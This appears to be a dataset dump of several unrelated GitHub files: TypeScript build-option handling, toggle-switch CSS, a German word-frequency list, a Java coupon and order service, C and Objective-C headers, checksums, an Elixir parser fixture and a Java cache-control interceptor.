if (propertiesFromTargetOptions.indexOf(propertyName) === -1) {
if (propertiesFromTarget.indexOf(propertyName) > -1) {
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the task or target, not under options.`;
warnings.push(warningText);
} else if (lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) === -1
&& lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) > -1) {
let index = lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTarget[index];
let warningText = `Property "${propertyName}" in ${configName} is possibly in the wrong place and will be ignored. ` +
`It is expected on the task or target, not under options. It is also the wrong case and should be ${correctPropertyName}.`;
warnings.push(warningText);
}
}
}
}
}
}
function checkFixableCaseIssues(task: ITargetOptions, configName: string) {
if (task) {
for (let propertyName in task) {
if ((propertiesFromTarget.indexOf(propertyName) === -1)
&& (lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase()) > -1)
&& (propertiesFromTargetOptions.indexOf(propertyName) === -1)) {
let index = lowercaseTargetProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTarget[index];
let warningText = `Property "${propertyName}" in ${configName} is incorrectly cased; it should ` +
`be "${correctPropertyName}". Fixing it for you and proceeding.`;
warnings.push(warningText);
task[correctPropertyName] = task[propertyName];
delete task[propertyName];
}
}
for (let propertyName in task.options) {
if ((propertiesFromTargetOptions.indexOf(propertyName) === -1)
&& (lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase()) > -1)
&& (propertiesFromTarget.indexOf(propertyName) === -1)) {
let index = lowercaseTargetOptionsProps.indexOf(propertyName.toLocaleLowerCase());
let correctPropertyName = propertiesFromTargetOptions[index];
let warningText = `Property "${propertyName}" in ${configName} options is incorrectly cased; it should ` +
`be "${correctPropertyName}". Fixing it for you and proceeding.`;
warnings.push(warningText);
task.options[correctPropertyName] = task.options[propertyName];
delete task.options[propertyName];
}
}
}
}
}
function applyGruntOptions(applyTo: IGruntTSOptions, gruntOptions: ITargetOptions): IGruntTSOptions {
if (gruntOptions) {
for (const propertyName of propertiesFromTarget) {
if (propertyName in gruntOptions && propertyName !== 'vs') {
if (typeof gruntOptions[propertyName] === 'string' && utils.hasValue(gruntOptions[propertyName]) &&
delayTemplateExpansion.indexOf(propertyName) === -1) {
applyTo[propertyName] = templateProcessor(gruntOptions[propertyName], {});
} else {
applyTo[propertyName] = gruntOptions[propertyName];
}
}
}
if (gruntOptions.options) {
for (const propertyName of propertiesFromTargetOptions) {
if (propertyName in gruntOptions.options) {
if (typeof gruntOptions.options[propertyName] === 'string' && utils.hasValue(gruntOptions.options[propertyName]) &&
delayTemplateExpansion.indexOf(propertyName) === -1) {
applyTo[propertyName] = templateProcessor(gruntOptions.options[propertyName], {});
} else {
applyTo[propertyName] = gruntOptions.options[propertyName];
}
}
}
}
}
return applyTo;
}
function copyCompilationTasks(options: IGruntTSOptions, resolvedFiles: IGruntTSCompilationInfo[], outputInfo: {outDir?: string, out?: string}) {
if (!utils.hasValue(options.CompilationTasks)) {
options.CompilationTasks = [];
}
if (!utils.hasValue(resolvedFiles) || resolvedFiles.length === 0) {
if (options.CompilationTasks.length === 0 && (('outDir' in outputInfo) || ('out' in outputInfo))) {
const newCompilationTask : IGruntTSCompilationInfo = {
src: []
};
if ('outDir' in outputInfo) {
newCompilationTask.outDir = outputInfo.outDir;
}
if ('out' in outputInfo) {
newCompilationTask.outDir = outputInfo.outDir;
}
options.CompilationTasks.push(newCompilationTask);
}
return options;
}
for (let i = 0; i < resolvedFiles.length; i += 1) {
let glob: string[];
const orig = (<{orig?: {src?: string[] | string}}>resolvedFiles[i]).orig;
if (orig && ('src' in orig)) {
glob = [].concat(orig.src);
}
let compilationSet = {
src: _.map(resolvedFiles[i].src, (fileName) => utils.enclosePathInQuotesIfRequired(fileName)),
out: utils.enclosePathInQuotesIfRequired(resolvedFiles[i].out),
outDir: utils.enclosePathInQuotesIfRequired(resolvedFiles[i].outDir),
glob
};
if ('dest' in resolvedFiles[i] && resolvedFiles[i].dest) {
let dest: string;
if (_.isArray(resolvedFiles[i].dest)) {
// using an array for dest is not supported. Only take first element.
dest = resolvedFiles[i].dest[0];
} else {
dest = resolvedFiles[i].dest;
}
if (utils.isJavaScriptFile(dest)) {
compilationSet.out = dest;
} else {
compilationSet.outDir = dest;
}
}
options.CompilationTasks.push(compilationSet);
}
return options;
}
function enclosePathsInQuotesIfRequired(options: IGruntTSOptions) {
if (options.rootDir) {
options.rootDir = utils.enclosePathInQuotesIfRequired(options.rootDir);
}
if (options.mapRoot) {
options.mapRoot = utils.enclosePathInQuotesIfRequired(options.mapRoot);
}
if (options.sourceRoot) {
options.sourceRoot = utils.enclosePathInQuotesIfRequired(options.sourceRoot);
}
return options;
}
function addressAssociatedOptionsAndResolveConflicts(options: IGruntTSOptions) {
if (options.emitDecoratorMetadata) {
options.experimentalDecorators = true;
}
if (options.inlineSourceMap && options.sourceMap) {
options.warnings.push('TypeScript cannot use inlineSourceMap and sourceMap together. Ignoring sourceMap.');
options.sourceMap = false;
}
if (options.inlineSources && !options.sourceMap) {
options.inlineSources = true;
options.inlineSourceMap = true;
options.sourceMap = false;
}
if ('comments' in options && 'removeComments' in options) {
options.warnings.push(`WARNING: Option "comments" and "removeComments" should not be used together. ` +
`The --removeComments value of ${!!options.removeComments} supercedes the --comments value of ${!!options.comments}`);
}
if ('comments' in options && !('removeComments' in options)) {
options.comments = !!options.comments;
options.removeComments = !options.comments;
} else if (!('comments' in options) && ('removeComments' in options)) {
options.removeComments = !!options.removeComments;
options.comments = !options.removeComments;
}
if ('html' in options &&
(options.CompilationTasks.length === 0 ||
!_.some(options.CompilationTasks, item => ((item.src || []).length > 0 || (item.glob || []).length > 0)))) {
options.errors.push(`ERROR: option "html" provided without corresponding TypeScript source files or glob to ` +
`compile. The transform will not occur unless grunt-ts also expects to compile some files.`);
}
options.CompilationTasks.forEach(compileTask => {
if (compileTask.out && compileTask.outDir) {
options.warnings.push(
'The parameter `out` is incompatible with `outDir`; pass one or the other - not both. Ignoring `out` and using `outDir`.'
);
compileTask.out = '';
}
});
return options;
}
function applyGruntTSDefaults(options: IGruntTSOptions) {
if (!('sourceMap' in options) && !('inlineSourceMap' in options)) {
options.sourceMap = GruntTSDefaults.sourceMap;
}
if (!('target' in options)) {
options.target = GruntTSDefaults.target;
}
if (!('fast' in options)) {
options.fast = GruntTSDefaults.fast;
}
if (!('compile' in options)) {
options.compile = GruntTSDefaults.compile;
}
if (!('htmlOutDir' in options)) {
options.htmlOutDir = null;
}
if (!('htmlOutDirFlatten' in options)) {
options.htmlOutDirFlatten = GruntTSDefaults.htmlOutDirFlatten;
}
if (!('htmlModuleTemplate' in options)) {
options.htmlModuleTemplate = GruntTSDefaults.htmlModuleTemplate;
}
if (!('htmlVarTemplate' in options)) {
options.htmlVarTemplate = GruntTSDefaults.htmlVarTemplate;
}
if (!('removeComments' in options) && !('comments' in options)) {
options.removeComments = GruntTSDefaults.removeComments;
}
if (!('failOnTypeErrors' in options)) {
options.failOnTypeErrors = GruntTSDefaults.failOnTypeErrors;
}
if (!('emitGruntEvents' in options)) {
options.emitGruntEvents = GruntTSDefaults.emitGruntEvents;
}
return options;
}
| {
"pile_set_name": "Github"
} |
.onoffswitch {
position: relative; width: 90px;
-webkit-user-select:none; -moz-user-select:none; -ms-user-select: none;
}
.onoffswitch-checkbox {
display: none;
}
.onoffswitch-label {
display: block; overflow: hidden; cursor: pointer;
border: 2px solid #FFFFFF; border-radius: 20px;
}
.onoffswitch-inner {
display: block; width: 200%; margin-left: -100%;
transition: margin 0.3s ease-in 0s;
}
.onoffswitch-inner:before, .onoffswitch-inner:after {
display: block; float: left; width: 50%; height: 30px; padding: 0; line-height: 30px;
font-size: 15px; color: white; font-family: Trebuchet, Arial, sans-serif; font-weight: bold;
box-sizing: border-box;
}
.onoffswitch-inner:before {
content: "ON";
padding-left: 12px;
background-color: #008CBA; color: #FFFFFF;
}
.onoffswitch-inner:after {
content: "OFF";
padding-right: 12px;
background-color: #EEEEEE; color: #999999;
text-align: right;
}
.onoffswitch-switch {
display: block; width: 12px; margin: 9px;
background: #FFFFFF;
position: absolute; top: 0; bottom: 0;
right: 56px;
border: 2px solid #FFFFFF; border-radius: 20px;
transition: all 0.3s ease-in 0s;
}
.onoffswitch-checkbox:checked + .onoffswitch-label .onoffswitch-inner {
margin-left: 0;
}
.onoffswitch-checkbox:checked + .onoffswitch-label .onoffswitch-switch {
right: 0px;
}
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 8384ab388a4037649a1f64fb2e1a8e7f
timeCreated: 1524005968
licenseType: Free
NativeFormatImporter:
mainObjectFileID: 11400000
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
JEKATERINBURG 2
JENA 6
JERUSALEM 48
JET 2
Je 58
Jean 54
Jean-Bertrand 6
Jean-Christophe 2
Jean-Claude 10
Jean-Cyril 2
Jean-Francois 2
Jean-Jacques 8
Jean-Louis 8
Jean-Luc 8
Jean-Marie 4
Jean-Michel 4
Jean-Pascal 4
Jean-Paul 2
Jean-Pierre 2
Jean-Pol 2
Jeanne 6
Jeannette 4
Jeans 2
Jecken 2
Jede 32
Jedem 4
Jeden 8
Jedenfalls 22
Jeder 80
Jedermann 4
Jedes 26
Jedesmal 8
Jediot 2
Jedoch 16
Jeep 2
Jeep-Safari 2
Jeff 4
Jefferson 2
Jeffrey 8
Jegor 6
Jekken 2
Jellinek 2
Jellineks 2
Jelpke 4
Jelzin 148
Jelzin-Clique 2
Jelzins 18
Jemand 4
Jemen 6
Jemeniter 4
Jemenitische 2
Jemens 4
Jena 24
Jenaer 10
Jene 8
Jener 2
Jenkins 4
Jennie 2
Jenoptik 10
Jenoptik-Führungskräfte 2
Jenoptik-GmbH 2
Jenoptik-Manager 2
Jens 14
Jenseits 16
Jeremy 2
Jericho 4
Jerko 2
Jeroen 2
Jersey 4
Jeru-Salem 2
Jerusalem 74
Jerusalem-Besuch 2
Jerusalemer 4
Jerusalems 4
Jerzy 10
Jeschke 2
Jesper 2
Jesuit 2
Jesuiten-Zögling 2
Jesus 6
Jet 2
Jets 14
Jetta-Modellen 2
Jetz 2
Jetzt 160
Jever 6
Jeweils 4
Jewgeni 4
Jewish 4
je 274
jede 154
jedem 134
jeden 194
jedenfalls 118
jeder 266
jederart 2
jedermann 14
jederzeit 18
jedes 118
jedesmal 10
jedoch 810
jedwede 2
jedweder 8
jegliche 14
jeglichen 6
jeglicher 4
jegliches 2
jeher 6
jeht 2
jemals 14
jemand 62
jemandem 8
jemanden 14
jemenitische 2
jemenitischen 8
jemenitischer 6
jene 200
jenem 24
jenen 76
jener 96
jenes 52
jenseitigen 2
jenseits 80
jetten 2
jetzige 32
jetzigen 40
jetziges 4
jetzt 832
jeweilig 2
jeweilige 8
jeweiligen 42
jeweiliges 2
jeweils 168
| {
"pile_set_name": "Github"
} |
package com.aylson.dc.owner.service.impl;
import java.util.Date;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.aylson.core.exception.ServiceException;
import com.aylson.core.frame.dao.BaseDao;
import com.aylson.core.frame.domain.Result;
import com.aylson.core.frame.domain.ResultCode;
import com.aylson.core.frame.service.impl.BaseServiceImpl;
import com.aylson.dc.base.OwnerGeneralConstant.AppointmentState;
import com.aylson.dc.base.OwnerGeneralConstant.DesignState;
import com.aylson.dc.owner.dao.DesignDao;
import com.aylson.dc.owner.po.Design;
import com.aylson.dc.owner.search.DesignSearch;
import com.aylson.dc.owner.service.AppointmentService;
import com.aylson.dc.owner.service.DesignService;
import com.aylson.dc.owner.service.OrderService;
import com.aylson.dc.owner.service.QuotationService;
import com.aylson.dc.owner.vo.AppointmentVo;
import com.aylson.dc.owner.vo.DesignVo;
import com.aylson.dc.owner.vo.OrderVo;
import com.aylson.dc.owner.vo.QuotationVo;
import com.aylson.dc.sys.po.CouponUserRelations;
import com.aylson.dc.sys.service.CouponDetailService;
import com.aylson.dc.sys.service.CouponUserRelationsService;
import com.aylson.dc.sys.vo.CouponDetailVo;
@Service
public class DesignServiceImpl extends BaseServiceImpl<Design,DesignSearch> implements DesignService {
@Autowired
private DesignDao designDao;
@Autowired
private AppointmentService appointmentService;
@Autowired
private OrderService orderService;
@Autowired
private CouponUserRelationsService couponUserRelationsService; //优惠券活动
@Autowired
private CouponDetailService couponDetailService; //优惠券活动明细配置
@Autowired
private QuotationService quotationService; //优惠券活动明细配置
@Override
protected BaseDao<Design,DesignSearch> getBaseDao() {
return designDao;
}
@Override
@Transactional
public Result confirmQuotation(Integer designId, Boolean isSatisfy) {
Result result = new Result();
//参数校验
if(designId == null){
result.setError(ResultCode.CODE_STATE_4006, "获取不到设计信息表id");
return result;
}
if(isSatisfy == null){
result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
return result;
}
//参数正确
DesignVo designVo = this.designDao.selectById(designId);
Boolean flag = false; //更新结果
Boolean canUpdateAppoint = false; //是否需要更新预约信息状态
Integer appointState = AppointmentState.SATISFY_QUOTE;//预约信息表要更新的状态
if(isSatisfy){//如果满意报价,将设计信息表的状态修改为:满意报价,同时如果相应预约信息的所有设计表都满意,那么预约信息表的状态也修改为:满意报价
designVo.setState(DesignState.SATISFY_QUOTE);
}else{//如果不满意报价,将设计信息表的状态修改为:不满意报价,如果预约信息表的状态还没有修改为:不满意报价,那么也要更新状态
designVo.setState(DesignState.NOTSATISFY_QUOTE);
}
flag = this.designDao.updateById(designVo);//更新设计信息表状态
if(flag){
if(!isSatisfy && AppointmentState.NOTSATISFY_QUOTE != designVo.getAppointState()){
appointState = AppointmentState.NOTSATISFY_QUOTE;
canUpdateAppoint = true;
}
if(isSatisfy){
DesignSearch designSearch = new DesignSearch();
List<DesignVo> designVoList = this.designDao.select(designSearch);
if(designVoList != null && designVoList.size() > 0){
for(DesignVo temp: designVoList){
if(DesignState.NOTSATISFY_QUOTE == temp.getState().intValue()){//不满意
canUpdateAppoint = false;
break;
}
}
}
}
if(canUpdateAppoint){
AppointmentVo appointmentVo = new AppointmentVo();
appointmentVo.setId(designVo.getAppointId());
appointmentVo.setState(appointState);
flag = this.appointmentService.edit(appointmentVo);
if(!flag){
result.setError(ResultCode.CODE_STATE_4006, "更新预约信息状态失败");
throw new ServiceException("更新预约信息状态失败");
}
}
result.setOK(ResultCode.CODE_STATE_200, "操作成功");
}else{
result.setError(ResultCode.CODE_STATE_4006, "更新设计信息表状态失败");
return result;
}
return result;
}
@Override
@Transactional
public Result confirmAllQuotation(Integer appointId, Boolean isSatisfy) {
Result result = new Result();
//参数校验
if(appointId == null){
result.setError(ResultCode.CODE_STATE_4006, "找不到预约信息,请稍候再试");
return result;
}
if(isSatisfy == null){
result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
return result;
}
//参数正确,处理数据
DesignSearch designSearch = new DesignSearch();
designSearch.setAppointId(appointId);
List<DesignVo> designList = this.designDao.select(designSearch);
AppointmentVo appointmentVo = new AppointmentVo();
appointmentVo.setId(appointId);
if(designList != null && designList.size() > 0){
for(DesignVo designVo:designList){
if(isSatisfy){//如果满意报价
designVo.setState(DesignState.CONFIRM_ORDER);
appointmentVo.setState(AppointmentState.CONFIRM_ORDER);
}else{//如果不满意报价
designVo.setState(DesignState.NOTSATISFY_QUOTE);
appointmentVo.setState(AppointmentState.NOTSATISFY_QUOTE);
}
}
}else{
result.setError(ResultCode.CODE_STATE_4006, "找不到对应的设计信息");
return result;
}
//处理完毕,更新数据
Boolean flag = this.appointmentService.edit(appointmentVo);
if(flag){
flag = this.designDao.batchUpdate(designList);
if(!flag){
result.setError(ResultCode.CODE_STATE_4006, "更新报价状态信息失败");
throw new ServiceException("更新报价状态信息失败");
}
}else{
result.setError(ResultCode.CODE_STATE_4006, "更新预约状态信息失败");
return result;
}
//满意报价,添加订单
if(isSatisfy){
AppointmentVo appointVo = this.appointmentService.getById(appointId);//更新预约信息
for(DesignVo designVo:designList){
OrderVo orderVo = new OrderVo();
orderVo.setAppointId(appointId);
orderVo.setAppointNo(appointVo.getBillCode());
orderVo.setMobilePhone(appointVo.getMobilePhone());
orderVo.setName(appointVo.getName());
orderVo.setProvince(appointVo.getProvince());
orderVo.setProvinceId(appointVo.getProvinceId());
orderVo.setCity(appointVo.getCity());
orderVo.setCityId(appointVo.getCityId());
orderVo.setArea(appointVo.getArea());
orderVo.setAreaId(appointVo.getAreaId());
orderVo.setAddress(appointVo.getAddress());
orderVo.setDecorateProject(appointVo.getDecorateProject());
orderVo.setDecorateProjectTypes(appointVo.getDecorateProjectTypes());
orderVo.setDesignId(designVo.getId());
orderVo.setDesignNo(designVo.getBillCode());
orderVo.setDesignType(designVo.getDesignType());
result = this.orderService.addOrder(orderVo);
if(!result.isSuccess()){
throw new ServiceException("添加订单失败");
}
}
}
result.setOK(ResultCode.CODE_STATE_200, "操作成功");
return result;
}
@Override
@Transactional
public Result confirmAllQuotation(Integer appointId, Integer couponId, Integer couponUserId, Boolean isSatisfy) {
Result result = new Result();
CouponDetailVo couponDetailVo = null; //优惠券明细
CouponUserRelations couponUserRelations = null; //优惠券用户关系
//参数校验
if(appointId == null){
result.setError(ResultCode.CODE_STATE_4006, "获取预约信息失败,请稍候再试");
return result;
}
if(isSatisfy == null){
result.setError(ResultCode.CODE_STATE_4006, "获取不到确认的结果");
return result;
}
AppointmentVo appointVo = this.appointmentService.getById(appointId);
if(appointVo == null){
result.setError(ResultCode.CODE_STATE_4006, "获取预约信息失败,请稍候再试");
return result;
}
if(appointVo != null && AppointmentState.CONFIRM_ORDER == appointVo.getState().intValue()){
result.setError(ResultCode.CODE_STATE_4006, "已经下过单了,不能重复下单");
return result;
}
if(isSatisfy){//如果满意并下单的校验
if((couponId != null && couponUserId == null)
|| (couponId == null && couponUserId != null)){
result.setError(ResultCode.CODE_STATE_4006, "优惠券信息不完整");
return result;
}
//如果使用了优惠券,判断该券是否存在
if(couponId != null && couponUserId != null){
couponDetailVo = this.couponDetailService.getById(couponId);
if(couponDetailVo == null){
result.setError(ResultCode.CODE_STATE_4006, "找不到该优惠券的信息");
return result;
}
couponUserRelations = this.couponUserRelationsService.getById(couponUserId);
if(couponUserRelations == null){
result.setError(ResultCode.CODE_STATE_4006, "找不到该优惠券的用户信息");
return result;
}
if(couponUserRelations.getIsUsed().intValue() == 1){
result.setError(ResultCode.CODE_STATE_4006, "该优惠券已经使用过了");
return result;
}
}
}
//参数正确,处理数据
DesignSearch designSearch = new DesignSearch();
designSearch.setAppointId(appointId);
List<DesignVo> designList = this.designDao.select(designSearch);
AppointmentVo appointmentVo = new AppointmentVo();
appointmentVo.setId(appointId);
if(designList != null && designList.size() > 0){
for(DesignVo designVo:designList){
if(isSatisfy){//如果满意报价
designVo.setState(DesignState.CONFIRM_ORDER);
appointmentVo.setState(AppointmentState.CONFIRM_ORDER);
}else{//如果不满意报价
designVo.setState(DesignState.NOTSATISFY_QUOTE);
appointmentVo.setState(AppointmentState.NOTSATISFY_QUOTE);
}
}
}else{
result.setError(ResultCode.CODE_STATE_4006, "找不到对应的设计信息");
return result;
}
//处理完毕,更新数据
Boolean flag = this.appointmentService.edit(appointmentVo);
if(flag){
flag = this.designDao.batchUpdate(designList);
if(!flag){
result.setError(ResultCode.CODE_STATE_4006, "更新报价状态信息失败");
throw new ServiceException("更新报价状态信息失败");
}
}else{
result.setError(ResultCode.CODE_STATE_4006, "更新预约状态信息失败");
return result;
}
//满意报价,添加订单
if(isSatisfy){
//AppointmentVo appointVo = this.appointmentService.getById(appointId);
if(designList != null && designList.size() > 0){
for(int i=0; i<designList.size(); i++){
DesignVo designVo = designList.get(i);
OrderVo orderVo = new OrderVo();
orderVo.setAppointId(appointId);
orderVo.setAppointNo(appointVo.getBillCode());
orderVo.setMobilePhone(appointVo.getMobilePhone());
orderVo.setName(appointVo.getName());
orderVo.setProvince(appointVo.getProvince());
orderVo.setProvinceId(appointVo.getProvinceId());
orderVo.setCity(appointVo.getCity());
orderVo.setCityId(appointVo.getCityId());
orderVo.setArea(appointVo.getArea());
orderVo.setAreaId(appointVo.getAreaId());
orderVo.setAddress(appointVo.getAddress());
orderVo.setDecorateProject(appointVo.getDecorateProject());
orderVo.setDecorateProjectTypes(appointVo.getDecorateProjectTypes());
orderVo.setDesignId(designVo.getId());
orderVo.setDesignNo(designVo.getBillCode());
orderVo.setDesignType(designVo.getDesignType());
result = this.orderService.addOrder(orderVo,i);
if(!result.isSuccess()){
throw new ServiceException("添加订单失败");
}
}
}
//如果选择了优惠券
if(couponDetailVo != null && couponUserRelations != null){
//更新报价表的设计信息
QuotationVo firstQuotationVo = this.quotationService.getByDesignId(designList.get(0).getId());
if(firstQuotationVo != null){
QuotationVo updateQuotationVo = new QuotationVo();
updateQuotationVo.setId(firstQuotationVo.getId());
updateQuotationVo.setCouponValue(couponDetailVo.getCouponValue());//券值
updateQuotationVo.setCouponId(couponUserRelations.getId());//用户优惠券关系id
flag = this.quotationService.edit(updateQuotationVo);
if(!flag){
result.setError(ResultCode.CODE_STATE_4006, "更新报价单优惠券信息失败");
throw new ServiceException("更新报价单优惠券信息失败");
}
couponUserRelations.setIsUsed(1); //已使用
couponUserRelations.setUsedTime(new Date());
flag = this.couponUserRelationsService.edit(couponUserRelations);
if(!flag){
result.setError(ResultCode.CODE_STATE_4006, "更新优惠券状态失败");
throw new ServiceException("更新优惠券状态失败");
}
}else{
result.setError(ResultCode.CODE_STATE_4006, "获取报价单信息失败");
throw new ServiceException("获取报价单信息失败");
}
}
}
result.setOK(ResultCode.CODE_STATE_200, "操作成功");
return result;
}
}
| {
"pile_set_name": "Github"
} |
/*
BLIS
An object-based framework for developing high-performance BLAS-like
libraries.
Copyright (C) 2014, The University of Texas at Austin
Copyright (C) 2016, Hewlett Packard Enterprise Development LP
Copyright (C) 2018, Advanced Micro Devices, Inc.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name(s) of the copyright holder(s) nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef BLIS_ENV_H
#define BLIS_ENV_H
gint_t bli_env_get_var( const char* env, gint_t fallback );
//void bli_env_set_var( const char* env, dim_t value );
#endif
| {
"pile_set_name": "Github"
} |
# Locally calculated
sha256 4a1532bcf3731aade40936f6d6a586ed5a66ca4c7455e1338d1f6c3e09221328 libcap-ng-0.7.9.tar.gz
sha256 32b1062f7da84967e7019d01ab805935caa7ab7321a7ced0e30ebe75e5df1670 COPYING
sha256 f18a0811fa0e220ccbc42f661545e77f0388631e209585ed582a1c693029c6aa COPYING.LIB
| {
"pile_set_name": "Github"
} |
//
// KxAudioManager.h
// kxmovie
//
// Created by Kolyvan on 23.10.12.
// Copyright (c) 2012 Konstantin Boukreev . All rights reserved.
//
// https://github.com/kolyvan/kxmovie
// this file is part of KxMovie
// KxMovie is licenced under the LGPL v3, see lgpl-3.0.txt
#import <CoreFoundation/CoreFoundation.h>
typedef void (^KxAudioManagerOutputBlock)(float *data, UInt32 numFrames, UInt32 numChannels);
@protocol KxAudioManager <NSObject>
// 输出频道数
@property (readonly) UInt32 numOutputChannels;
// 采样率
@property (readonly) Float64 samplingRate;
// 每个样本字节数
@property (readonly) UInt32 numBytesPerSample;
// 音量
@property (readonly) Float32 outputVolume;
// 是否正在播放
@property (readonly) BOOL playing;
// 音轨线
@property (readonly, strong) NSString *audioRoute;
// 音频输出管理回调, 回调 (数据, 帧数,音轨数)
@property (readwrite, copy) KxAudioManagerOutputBlock outputBlock;
// 激活声音会话
- (BOOL) activateAudioSession;
// 取消激活声音会话
- (void) deactivateAudioSession;
// 播放
- (BOOL) play;
// 暂停
- (void) pause;
@end
@interface KxAudioManager : NSObject
+ (id<KxAudioManager>) audioManager;
@end
| {
"pile_set_name": "Github"
} |
Elixir File(0,74)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(0,23)
ElixirIdentifierImpl(IDENTIFIER)(0,10)
PsiElement(identifier)('identifier')(0,10)
PsiWhiteSpace(' ')(10,11)
ElixirDoBlockImpl(DO_BLOCK)(11,23)
PsiElement(do)('do')(11,13)
PsiWhiteSpace(' ')(13,14)
ElixirBlockListImpl(BLOCK_LIST)(14,19)
ElixirBlockItemImpl(BLOCK_ITEM)(14,19)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(14,19)
PsiElement(catch)('catch')(14,19)
PsiWhiteSpace(' ')(19,20)
PsiElement(end)('end')(20,23)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(23,24)
PsiElement(\\n, \\r\\n)('\n')(23,24)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(24,48)
ElixirIdentifierImpl(IDENTIFIER)(24,34)
PsiElement(identifier)('identifier')(24,34)
PsiWhiteSpace(' ')(34,35)
ElixirDoBlockImpl(DO_BLOCK)(35,48)
PsiElement(do)('do')(35,37)
PsiWhiteSpace(' ')(37,38)
ElixirBlockListImpl(BLOCK_LIST)(38,44)
ElixirBlockItemImpl(BLOCK_ITEM)(38,44)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(38,43)
PsiElement(catch)('catch')(38,43)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(43,44)
PsiElement(;)(';')(43,44)
PsiWhiteSpace(' ')(44,45)
PsiElement(end)('end')(45,48)
ElixirEndOfExpressionImpl(END_OF_EXPRESSION)(48,49)
PsiElement(\\n, \\r\\n)('\n')(48,49)
UNMATCHED_UNQUALIFIED_NO_ARGUMENTS_CALL(49,74)
ElixirIdentifierImpl(IDENTIFIER)(49,59)
PsiElement(identifier)('identifier')(49,59)
PsiWhiteSpace(' ')(59,60)
ElixirDoBlockImpl(DO_BLOCK)(60,74)
PsiElement(do)('do')(60,62)
PsiWhiteSpace('\n ')(62,65)
ElixirBlockListImpl(BLOCK_LIST)(65,70)
ElixirBlockItemImpl(BLOCK_ITEM)(65,70)
ElixirBlockIdentifierImpl(BLOCK_IDENTIFIER)(65,70)
PsiElement(catch)('catch')(65,70)
PsiWhiteSpace('\n')(70,71)
PsiElement(end)('end')(71,74)
| {
"pile_set_name": "Github"
} |
/*
* Knowage, Open Source Business Intelligence suite
* Copyright (C) 2016 Engineering Ingegneria Informatica S.p.A.
*
* Knowage is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Knowage is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package it.eng.spagobi.rest.interceptors;
import java.io.IOException;
import javax.servlet.http.HttpServletResponse;
import javax.ws.rs.container.ContainerRequestContext;
import javax.ws.rs.container.ContainerResponseContext;
import javax.ws.rs.container.ContainerResponseFilter;
import javax.ws.rs.core.Context;
import javax.ws.rs.ext.Provider;
import org.apache.log4j.Logger;
/**
* This interceptor injects into HTTP response headers information to disable browser cache, in case the response does not already contain any header about
* cache, i.e. "CacheControl", "Pragma" and "Expires".
*
* @author Davide Zerbetto ([email protected])
*
*/
@Provider
public class NoCacheInterceptor implements ContainerResponseFilter {
private static Logger logger = Logger.getLogger(NoCacheInterceptor.class);
@Context
private HttpServletResponse httpResponse;
@Override
public void filter(ContainerRequestContext requestContext, ContainerResponseContext responseContext) throws IOException {
logger.debug("IN");
if (!httpResponse.containsHeader("CacheControl") && !httpResponse.containsHeader("Pragma") && !httpResponse.containsHeader("Expires")) {
httpResponse.setHeader("CacheControl", "no-cache");
httpResponse.setHeader("Pragma", "no-cache");
httpResponse.setHeader("Expires", "-1");
}
logger.debug("OUT");
}
}
| {
"pile_set_name": "Github"
} |
/*
* SonarQube
* Copyright (C) 2009-2020 SonarSource SA
* mailto:info AT sonarsource DOT com
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 3 of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
